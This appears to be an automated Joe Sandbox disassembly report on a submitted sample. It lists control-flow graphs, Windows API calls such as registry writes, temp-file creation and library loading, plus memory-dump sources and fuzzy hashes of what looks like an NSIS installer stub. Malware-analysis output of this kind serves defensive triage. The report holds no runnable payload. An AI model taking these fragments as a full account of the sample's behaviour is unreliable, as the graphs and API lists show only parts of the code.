                                                                                                            control_flow_graph 704 40264a-402663 call 402c1f 707 402ac5-402ac8 704->707 708 402669-402670 704->708 711 402ace-402ad4 707->711 709 402672 708->709 710 402675-402678 708->710 709->710 712 4027dc-4027e4 710->712 713 40267e-40268d call 406348 710->713 712->707 713->712 717 402693 713->717 718 402699-40269d 717->718 719 402732-402735 718->719 720 4026a3-4026be ReadFile 718->720 721 402737-40273a 719->721 722 40274d-40275d call 405f61 719->722 720->712 723 4026c4-4026c9 720->723 721->722 724 40273c-402747 call 405fbf 721->724 722->712 733 40275f 722->733 723->712 726 4026cf-4026dd 723->726 724->712 724->722 729 4026e3-4026f5 MultiByteToWideChar 726->729 730 402798-4027a4 call 40632f 726->730 729->733 734 4026f7-4026fa 729->734 730->711 736 402762-402765 733->736 737 4026fc-402707 734->737 736->730 738 402767-40276c 736->738 737->736 739 402709-40272e SetFilePointer MultiByteToWideChar 737->739 740 4027a9-4027ad 738->740 741 40276e-402773 738->741 739->737 742 402730 739->742 743 4027ca-4027d6 SetFilePointer 740->743 744 4027af-4027b3 740->744 741->740 745 402775-402788 741->745 742->733 743->712 746 4027b5-4027b9 744->746 747 4027bb-4027c8 744->747 745->712 748 40278a-402790 745->748 746->743 746->747 747->712 748->718 749 402796 748->749 749->712
                                                                                                            APIs
                                                                                                            • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                                              • Part of subcall function 00405FBF: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405FD5
                                                                                                            • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                            • String ID: 9
                                                                                                            • API String ID: 163830602-2366072709
                                                                                                            • Opcode ID: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                            • Instruction ID: add249696b334c0fceafe0529c612de3b1c59f5eaafd60b3ba6c21ea99dd66a9
                                                                                                            • Opcode Fuzzy Hash: cadc99d36448674c458fec809f66667da68abd58cfb7d9264b13fa75ded684dc
                                                                                                            • Instruction Fuzzy Hash: FD510A74D10219AEDF21DF95DA88AAEB779FF04304F50443BE901B72D0D7B89982CB59

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 750 406752-406772 GetSystemDirectoryW 751 406774 750->751 752 406776-406778 750->752 751->752 753 406789-40678b 752->753 754 40677a-406783 752->754 756 40678c-4067bf wsprintfW LoadLibraryExW 753->756 754->753 755 406785-406787 754->755 755->756
                                                                                                            APIs
                                                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                            • wsprintfW.USER32 ref: 004067A4
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067B8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                                                            • API String ID: 2200240437-1946221925
                                                                                                            • Opcode ID: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction ID: 07f60acf873a648e61080255fd3e200204736070213a9ab7c1209ab7057fe03e
                                                                                                            • Opcode Fuzzy Hash: 40aa1e09304642b089aa1993992f232c43871fa513f82abce0c0f0efb2bd037b
                                                                                                            • Instruction Fuzzy Hash: 27F0FC70540219AECB10AB68ED0DFAB366CA700304F10447AA64AF20D1EB789A24C798

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 757 70131777-701317b6 call 70131b5f 761 701318d6-701318d8 757->761 762 701317bc-701317c0 757->762 763 701317c2-701317c8 call 70132352 762->763 764 701317c9-701317d6 call 70132394 762->764 763->764 769 70131806-7013180d 764->769 770 701317d8-701317dd 764->770 771 7013180f-7013182b call 70132569 call 701315b4 call 70131272 GlobalFree 769->771 772 7013182d-70131831 769->772 773 701317f8-701317fb 770->773 774 701317df-701317e0 770->774 797 70131885-70131889 771->797 775 70131833-7013187c call 701315c6 call 70132569 772->775 776 7013187e-70131884 call 70132569 772->776 773->769 777 701317fd-701317fe call 70132d37 773->777 779 701317e2-701317e3 774->779 780 701317e8-701317e9 call 70132aac 774->780 775->797 776->797 791 70131803 777->791 786 701317f0-701317f6 call 70132724 779->786 787 701317e5-701317e6 779->787 788 701317ee 780->788 796 70131805 786->796 787->769 787->780 788->791 791->796 796->769 801 701318c6-701318cd 797->801 802 7013188b-70131899 call 7013252c 797->802 801->761 804 701318cf-701318d0 GlobalFree 801->804 807 701318b1-701318b8 802->807 808 7013189b-7013189e 802->808 804->761 807->801 810 701318ba-701318c5 call 7013153d 807->810 808->807 809 701318a0-701318a8 808->809 809->807 811 701318aa-701318ab FreeLibrary 809->811 810->801 811->807
                                                                                                            APIs
                                                                                                              • Part of subcall function 70131B5F: GlobalFree.KERNEL32(?), ref: 70131DB2
                                                                                                              • Part of subcall function 70131B5F: GlobalFree.KERNEL32(?), ref: 70131DB7
                                                                                                              • Part of subcall function 70131B5F: GlobalFree.KERNEL32(?), ref: 70131DBC
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70131825
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 701318AB
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 701318D0
                                                                                                              • Part of subcall function 70132352: GlobalAlloc.KERNEL32(00000040,?), ref: 70132383
                                                                                                              • Part of subcall function 70132724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,701317F6,00000000), ref: 701327F4
                                                                                                              • Part of subcall function 701315C6: wsprintfW.USER32 ref: 701315F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2274084322.0000000070131000.00000020.00000001.01000000.00000004.sdmp, Offset: 70130000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2273940310.0000000070130000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274182585.0000000070134000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2274265618.0000000070136000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_70130000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3962662361-3916222277
                                                                                                            • Opcode ID: 7e614eb40d81ba53f576cc58cf1887363d6002e4c3571fcf806be4997f33dfcd
                                                                                                            • Instruction ID: 6e9b3cbd7f825c035b5743d8c2ba9c9c1948b3f47913c52b542aa7910f1245ec
                                                                                                            • Opcode Fuzzy Hash: 7e614eb40d81ba53f576cc58cf1887363d6002e4c3571fcf806be4997f33dfcd
                                                                                                            • Instruction Fuzzy Hash: 3941C372500204AACB159F74DC85B8EFBACBF05310FA644B9FD079A686DBB89584CB64

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 814 4023e4-402415 call 402c41 * 2 call 402cd1 821 402ac5-402ad4 814->821 822 40241b-402425 814->822 824 402427-402434 call 402c41 lstrlenW 822->824 825 402438-40243b 822->825 824->825 826 40243d-40244e call 402c1f 825->826 827 40244f-402452 825->827 826->827 831 402463-402477 RegSetValueExW 827->831 832 402454-40245e call 4031d6 827->832 836 402479 831->836 837 40247c-40255d RegCloseKey 831->837 832->831 836->837 837->821 839 40288b-402892 837->839 839->821
                                                                                                            APIs
                                                                                                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd88AD.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsd88AD.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsd88AD.tmp,00000000,00000011,00000002), ref: 00402557
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseValuelstrlen
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsd88AD.tmp
                                                                                                            • API String ID: 2655323295-408224121
                                                                                                            • Opcode ID: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                            • Instruction ID: 2320c74fc41ffeb716861e397aa06506e2c1d49fdd3331f7b5a779c93e7e4390
                                                                                                            • Opcode Fuzzy Hash: 73e16f22230fec4bb41596bf14ea3730359cb40e1001d342c6dd81160fbf5f59
                                                                                                            • Instruction Fuzzy Hash: C4118471E00104BEEB10AFA5DE89EAEBB74EB44754F11803BF504B71D1DBB89D419B68

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 840 405f0d-405f19 841 405f1a-405f4e GetTickCount GetTempFileNameW 840->841 842 405f50-405f52 841->842 843 405f5d-405f5f 841->843 842->841 844 405f54 842->844 845 405f57-405f5a 843->845 844->845
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00435000,004034A3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF), ref: 00405F46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                            • API String ID: 1716503409-1331003597
                                                                                                            • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                            • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 846 402d44-402d6d call 406255 848 402d72-402d74 846->848 849 402d76-402d7c 848->849 850 402dec-402df0 848->850 851 402d98-402dad RegEnumKeyW 849->851 852 402d7e-402d80 851->852 853 402daf-402dc1 RegCloseKey call 4067c2 851->853 854 402dd0-402dde RegCloseKey 852->854 855 402d82-402d96 call 402d44 852->855 860 402de0-402de6 RegDeleteKeyW 853->860 861 402dc3-402dce 853->861 854->850 855->851 855->853 860->850 861->850
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$Enum
                                                                                                            • String ID:
                                                                                                            • API String ID: 464197530-0
                                                                                                            • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                            • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 863 40591f-40596a CreateDirectoryW 864 405970-40597d GetLastError 863->864 865 40596c-40596e 863->865 866 405997-405999 864->866 867 40597f-405993 SetFileSecurityW 864->867 865->866 867->865 868 405995 GetLastError 867->868 868->866
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405962
                                                                                                            • GetLastError.KERNEL32 ref: 00405976
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                            • GetLastError.KERNEL32 ref: 00405995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID:
                                                                                                            • API String ID: 3449924974-0
                                                                                                            • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                            • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                              • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                            • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                            APIs
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000002,00422708,00000000,?,?,Call,?,?,0040652A,80000002), ref: 004062FC
                                                                                                            • RegCloseKey.ADVAPI32(?,?,0040652A,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,00422708), ref: 00406307
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseQueryValue
                                                                                                            • String ID: Call
                                                                                                            • API String ID: 3356406503-1824292864
                                                                                                            • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                            • Instruction ID: efe3e51cb47fe95fa6bbb83f3cb46ebf457b8c4b35673ac5825ceff03b23bf8b
                                                                                                            • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                                                                            • Instruction Fuzzy Hash: B301717250020AEBDF218F55CD09EDB3FA9EF55354F114039FD15A2150E778D964CBA4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                            • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                            • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231752737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2231799800.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.2232351931.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_400000_ajRZflJ2ch.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                            • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.2231704701.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.2231593250.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
